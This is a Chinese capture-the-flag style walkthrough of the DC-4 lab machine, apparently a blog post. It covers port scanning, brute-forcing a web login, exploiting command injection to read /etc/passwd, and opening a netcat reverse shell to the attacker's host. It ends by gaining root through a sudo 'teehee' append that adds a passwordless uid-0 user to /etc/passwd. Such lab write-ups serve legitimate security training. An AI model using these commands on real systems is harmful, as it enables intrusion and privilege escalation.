DC靶机系列:DC-4

一、信息收集

  1. 查询本机ip及目标靶机ip

本机ip:192.168.56.104,靶机ip利用nmap或arp-scan查看

靶机ip:192.168.56.113

  1. 收集靶机开放端口

输入nmap -sS -sV -T5 -A 192.168.56.113

发现22和80端口,常用思路,查看靶机的web服务,然后找到对应的用户名和密码,利用此远程ssh,获取低权限,然后尝试进行提权操作

  1. 对应端口进行尝试

浏览靶机页面,发现了登录框

尝试看是否存在弱口令,测试发现无,尝试是否存在注入,用bp进行抓包,将抓到的包发送Intruder进行爆破

二、Web渗透

爆破后得到用户名为admin,密码为happy,登陆后发现存在远程命令的漏洞,进行抓包分析

这里发现命令是利用+号代替空格,构造一下命令,查看一下/etc/passwd

cat+/etc/passwd

从这发现了有三个用户charles、Jim、sam

利用这个远程命令,向攻击机返回一个shell,输入nc+192.168.56.104+5555+-e+/bin/bash

然后kali终端开启监听,nc -vlp 5555

下一步就是常规操作了

python -c 'import pty;pty.spawn("/bin/bash")'

进行一波信息收集后在/home下找到了三个用户,同时在jim目录下找到了一个旧密码的文件,查看文件并将文件中的内容写入一个新的文本,后面进行爆破使用

爆破出来,用户名jim,密码为jibril04,利用该用户进行ssh登录

登陆成功,看到了一个mbox文件,查看后发现好像是类似于邮件一样,再没什么别的能用的信息了,到这一步,就得想办法去提权了,这个用户的权限小的可怜,开始看能不能找到有用的信息

经过一番搜索发现了之前charles的密码

之前想看jim能不能进行提权,发现jim不可以运行

只能另开一个终端利用charles进行登录

发现存在teehee可以提示为root,这个东西是啥还真不知道

相关的英文可以自己去翻译,-a应该可以看懂吧,意思是可以在你给定的文件中添加,不能复写,那这就很简单了,我可以在/etc/passwd中,弄个简单的,直接提权

echo "xiaoli::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

然后直接su xiaoli,没有密码,直接成为root,完事就可以进到/root,cat flag.txt了

到此,DC系列的第4个靶机就结束了,还是比较简单的,可以巩固一些操作。

每天努力一点点,积累一点点,将碎片化的知识积累起来才不会白学!

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值